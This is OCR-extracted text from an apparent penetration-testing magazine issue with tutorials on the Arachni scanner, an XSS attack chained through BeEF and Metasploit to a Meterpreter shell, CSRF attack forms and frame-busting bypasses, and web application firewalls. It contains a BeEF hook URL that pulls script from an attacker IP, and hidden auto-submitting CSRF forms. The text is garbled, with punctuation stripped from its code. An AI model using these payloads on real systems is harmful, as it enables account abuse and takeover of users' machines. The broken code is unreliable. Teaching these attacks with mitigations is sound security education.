$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
Note the above code as well as another module based on the SVNDigger wordlists with filenames are now part of the experimental Arachni code base
ConclusionWe used Arachni in many of our application vulnerability assessments The good points are
bull Highly scalable architecture just create more servers with dispatchers and share the load This makes the scanner a lot more responsive and fast
bull Highly extensible create your own modules plug-ins and even reports with ease
bull User-friendly start your scan in minutesbull Very good XSS and SQLi detection with very few
false positives There are false negatives but this
is usually caused by Arachni not detecting the links to be audited This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy
bull Excellent reporting capabilities with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE)
Arachni lacks support for the following
bull No AJAX and JSON supportbull No JavaScript support
This means that you need to help Arachni finding links hidden in JavaScript eg by using it as a proxy between your browser and the web application Yoursquoll need a different tool (or use your brain and manual tests) to check for AJAXJSON related vulnerabilities in the application you are testing
Arachni also cannot examine and decompile Flash components but a lot of tools are at hand to help you with that Arachni does not perform WAF (Web Application Firewall) evasion but then again this is not necessarily difficult to do manually for a skilled consultant or hacker
And why not write your own module or plug-in that implements the missing functionality Arachni is certainly a tool worth adding to your toolkit
HERMAN STEVENSAfter a career of 15 years spanning many roles (developer security product trainer information security consultant Payment Card Industry auditor application security consultant) Herman Stevens now works and lives in Singapore where he is the director of his company Astyran Pte Ltd (httpwwwastyrancom) Astyran specialises in application security such as penetration tests vulnerability assessments secure code reviews awareness training and security in the SDLC Contact Herman through email (hermanstevensgmailcom) or visit his blog (httpblogastyransg)
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
In most commercial penetration testing reports itrsquos sufficient to just show a small alert popup this is to show that a particular parameter is vulnerable to
an XSS attack However this is not how an attacker would function in the real world Sure hersquod use a pop up initially to find out which parameter is vulnerable to an XSS attack Once hersquos identified that though hersquoll look to steal information by executing malicious JavaScript or even gain total control of the userrsquos machine
In this article wersquoll look at how an attacker can gain complete control over a userrsquos browser ultimately taking over the userrsquos machine by using Beef (A browser exploitation framework)
A Simple POCTo start off though letrsquos do exactly what the attacker would do which is to identify a vulnerability For simplicityrsquos
sake wersquoll assume that the attacker has already identified a vulnerable parameter on a page Here are the relevant files which you too can use on your web server if you want to try this also
HTML Page
ltHTMLgt
ltBODYgt
ltFORM NAME=rdquotestrdquo action=rdquosearch1phprdquo method=rdquoGETrdquogt
Search ltINPUT TYPE=rdquotextrdquo name=rdquosearchrdquogtltINPUTgt
ltINPUT TYPE=rdquosubmitrdquo name=rdquoSubmitrdquo value=SubmitgtltINPUTgt
ltFORMgt
ltBODYgt
ltHTMLgt
XSS Beef Metaspoilt Exploitation
Figure 2 BeeF after conguration
Cross Site scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code on the victimrsquos browser The impact of an XSS attack is only limited by the potency of the attackerrsquos JavaScript code
Figure 1 User enters in a search box
WEB APP VULNERABILITIES
Page 30 httppentestmagcom012011 (1) November Page 31 httppentestmagcom012011 (1) November
and click a few buttons to configure it Alternatively you could use a distribution like Backtrack which already has BeeF installed Here is a screenshot of how BeeF looks after it is configured (Figure 2)
Instead of the user clicking on a link which will generate a popup box the user will instead be tricked to click on a link which tells his browser to connect to the BeeF controller The URL that the user has to click on is
httplocalhostsearch1phpsearch=ltscript src=
rsquohttp19216856101beefhookbeefmagicjsphprsquogt
ltscriptgtampSubmit=Submit
The IP address here is the one on which you have BeeF running Once the user clicks on the link above you should see an entry in the BeeF controller window showing that a Zombie has connected You can see this in the Log section on the right hand side or the Zombie section on the left hand side Here is a screenshot which shows that a browser has connected to the Beef controller (Figure 3)
Click and highlight the zombie in the left pane and then click on Standard Modules ndash Alert Dialog This will result in a little popup box popping up on the victim machine Herersquos a screenshot which shows the same (Figure 4) And this is what the victim will see (Figure 5)
So as you can see because of Beef even an unskilled attacker can run code which he does not even understand on the victimrsquos machine and steal sensitive data Hence it becomes all the more
Server Side PHP Code
ltphp
$a=$_GET[lsquosearchrsquo]
echo bdquoThe parameter passed is $ardquo
gt
As you can see itrsquos some very simple code where the user enters something in a search box on the first page his input is sent to the server which reads the value of the parameter and prints it on to the screen So instead of a simple text input the attack enters a simple JavaScript into the box the JavaScript will execute on the userrsquos machine and not get displayed The user hence has to just been tricked into clicking on a link httplocalhostsearch1phpsearch=ltscriptgtalert(documentdomain)ltscriptgt
The screenshot below clarifies the above steps (Figure 1)
Beef ndash Hook the userrsquos browserNow while this example is sufficient to prove that the site is vulnerable to XSS itrsquos most certainly not what an attacker will stop at An attacker will use a tool like BeeF (Browser Exploitation Framework) to gain more control of the userrsquos browser and machine
I used an older version of Beef(032) as I just wanted to demonstrate what you can do with such a tool The newer version has been rewritten completely and has many more features For now though extract Beef from the tarball and copy it into your web server directory
Figure 3 Connection with BeeF controller
Figure 4 What attacer will see
Figure 5 What victim will see
Figure 6 Defacing the current Web Page
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
important to protect against XSS Wersquoll have a small section right at the end where I briefly tell you how to mitigate XSS
Irsquoll quickly discuss a few more examples using Beef before we move on to using it as a platform for other attacks Here are the screenshots for the same these are all a result of clicking on the various modules available under the Standard Modules menu
Defacing the Current Web PageThis results in the webpage being rewritten on the victim browser with the text in the lsquoDEFACE STRINGrsquo box Try it out (Figure 6)
Detect all Plugins on the Userrsquos BrowserThere are plenty of other plug-ins inside Beef under the Standard Modules and Browser modules tab which you can try out for yourself I wonrsquot discuss all of them here as the principle is the same What I want to do now though is use the userrsquos hooked Browser to take complete control of the userrsquos machine itself (Figure 7)
Integrate Beef with Metasploit and get a shellEdit Beefrsquos configuration files so that it can directly talk to Metasploit All I had to edit was msfphp to set the correct IP address Once this is done you can launch Metasploitrsquos browser based exploits from inside Beef
Figure 7 Detecting plugins on the user browser
Figure 8 startin Metaslpoit
Figure 9 bdquoJobsrdquo command
Figure 10 Metasploit after clicking bdquoSend Nowrdquo
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
WEB APP VULNERABILITIES
Page 32 httppentestmagcom012011 (1) November Page 33 httppentestmagcom012011 (1) November
Now first ensure that the Zombie is still connected Then click on Standard modules ndash Browser Exploit and configure the exploit as per the screenshot below Wersquore basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8)
Open a shell and run msfconsole to start metasploit Once you see the msfgt prompt click the zombie in the browser and click the Send Now button to send the exploit payload to the victim You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9)
If the victimrsquos browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit) it will connect back to the running Metasploit instance Herersquos what you see in Metasploit a while after you click Send Now (Figure 10)
Once yoursquove got a prompt yoursquore on that remote system and can do anything that you want with the privileges of that user Here are a few more screenshots of what you can do with Meterpreter The screenshots are self explanatory so I wonrsquot say much (Figure 11-13)
The user was apparently logged in with admin privileges and we could create a user by the name dennis on the remote machine At this point of time we have complete control over 1 machine
Once we have control over this machine we can use FTP or HTTP and download various other tools like Nmap Nessus a sniffer to capture all keystrokes on this machine or even another copy of Metasploit and install these on this machine We can then use these to port scan an entire internal network or search for vulnerabilities in other services that are running on other machines on the network Eventually over a period of time it is potentially possible to compromise every machine on that network
MitigationTo mitigate XSS one must do the following
Figure 13 Meterpreter window - screenshot 3
bull Make a list of parameters whose values depend on user input and whose resultant values after they are processed by application code are reflected in the userrsquos browser
bull All such output as in a) must be encoded before displaying it to the user The OWASP XSS prevention cheatsheet is a good guide for the same
bull White List and Black list filtering can also be used to completely disallow specific characters in user input fields
ConclusionIn a nutshell we can conclude that if even a single parameter is vulnerable to XSS it can result in the complete compromise of that userrsquos machine If the XSS is persistent then the number of users that could potentially be in trouble increases So while XSS does involve some kind of user input like clicking a link or visiting a page it is still a high risk vulnerability and must be mitigated throughout every application
ARVIND DORAISWAMYArvind Doraiswamy is an Information Security Professional with 6 years of experience in SystemNetwork and Web Application Penetration testing In addition he freelances in information security audits trainings and product development [Perl Ruby on Rails] while spending a lot of time learning more about malware analysis and reverse engineering Email ndash arvinddoraiswamygmailcomLinked In ndash httpwwwlinkedincompubarvind-doraiswamy39b21332Other writings ndash httpresourcesinfosecinstitutecomauthorarvind AND httpardsecblogspotcom
Referencesbull httpwwwtechnicalinfonetpapersCSShtmlbull httpswwwowasporgindexphpCross-site_Scripting_
28XSS29bull httpswwwowasporgindexphpXSS_28Cross_Site_
Scripting29_Prevention_Cheat_Sheetbull httpbeefprojectcom
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
In simple words when an evil website posts a new status to your Twitter account while your Twitter login session is still active
Csrf BasicsA simple example of this is the following hidden HTML code inside the evilcom webpage
ltimg src=rdquohttptwittercomhomestatus=evilcomrdquo
style=rdquodisplaynonerdquogt
Many web developers use POST instead of GET requests to avoid this kind of a malicious attack But this
approach is useless as shown by the following HTML code used to bypass that kind of a protection (Listing 1)
Usless DefensesThe following are the weak defenses
Only accept POST This stops simple link-based attacks (IMG frames etc) but hidden POST requests can be created within frames scripts etc
Referrer checking Some users prohibit referrers so you cannot just require referrer headers Techniques to selectively create HTTP request without referrers exist
Requiring multiStep transactions CSRF attacks can perform each step in order
DefenseThe approach used by many web developers is the CAPTCHA systems and one- time tokens CAPTCHA systems are widely used by asking a user to fill the text in the CAPTCHA image every time the user submits a form might make them stop visiting your website This is why web sites use one-time tokens Unlike the CAPTCHA system one-time tokens are unique values stored in a
Cross-site Request ForgeryIN-DEPTH ANALYSIS bull CYBER GATES bull 2011
Cross-Site Request Forgery (CSRF in short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the current active session of the authorized users
Listing 1 HTML code used to bypass protection
ltdiv style=displaynonegt
ltiframe name=hiddenFramegtltiframegt
ltform name=Form action=httpsitecompostphp
target=hiddenFrame
method=POSTgt
ltinput type=text name=message value=I like
wwwevilcom gt
ltinput type=submit gt
ltformgt
ltscriptgtdocumentFormsubmit()ltscriptgt
ltdivgt
WEB APP VULNERABILITIES
Page 34 httppentestmagcom012011 (1) November Page 35 httppentestmagcom012011 (1) November
indexphp(Victim website)
And the webpage which processes the request and stores the message only if the given token is correct
postphp(Victim website)
In-depth AnalysisIn-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token The following is a real scenarioListing 4
indexphp(Evil website)
For security reasons the same origin policy in browsers restricts access of browser-side program-ming languages such as JavaScript to access a remote content and the browser throws the following exception
Permission denied to access property lsquodocumentrsquo
var token = windowframes[0]documentforms[lsquomessageFormrsquo]
tokenvalue
Browserrsquos settings are not hard to modify So the best way for web application security is to secure web application itself
Frame BustingThe best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens FrameKillers are small piece of Javascript code used to protect web pages from being framed
ltscript type=rdquotextjavascriptrdquogt
if(top = self) toplocationreplace(location)
ltscriptgt
It consists of Conditional statement and Counter-action
statement
Common conditional statements are the following
if (top = self)
if (toplocation = selflocation)
if (toplocation = location)
if (parentframeslength gt 0)
if (window = top)
if (windowtop == windowself)
if (windowself = windowtop)
if (parent ampamp parent = window)
if (parent ampamp parentframes ampamp parentframeslengthgt0)
if((selfparentampamp(selfparent===self))ampamp(selfparentfr
ameslength=0))
webpage formrsquos hidden field and in a session at the same time to compare them after the page form submission
Mechanisms used to subvert one-time tokens is usually accomplished by brute force attacks Brute forcing attacks against one-time tokens is useful only if the mechanism is widely used by web developers For example the following PHP code
ltphp
$token = md5(uniqid(rand() TRUE))
$_SESSION[lsquotokenrsquo] = $token
gt
Defense Using One-time TokensTo understand better how this system works letrsquos take a look to a simple webpage which has a form with one-time token Listing 2
Listing 2 Wrong token
ltphp session_start()gt
lthtmlgt
ltheadgt
lttitlegtGOODCOMlttitlegt
ltheadgt
ltbodygt
ltphp
$token = md5(uniqid(rand()true))
$_SESSION[token] = $token
gt
ltform name=messageForm action=postphp method=POSTgt
ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
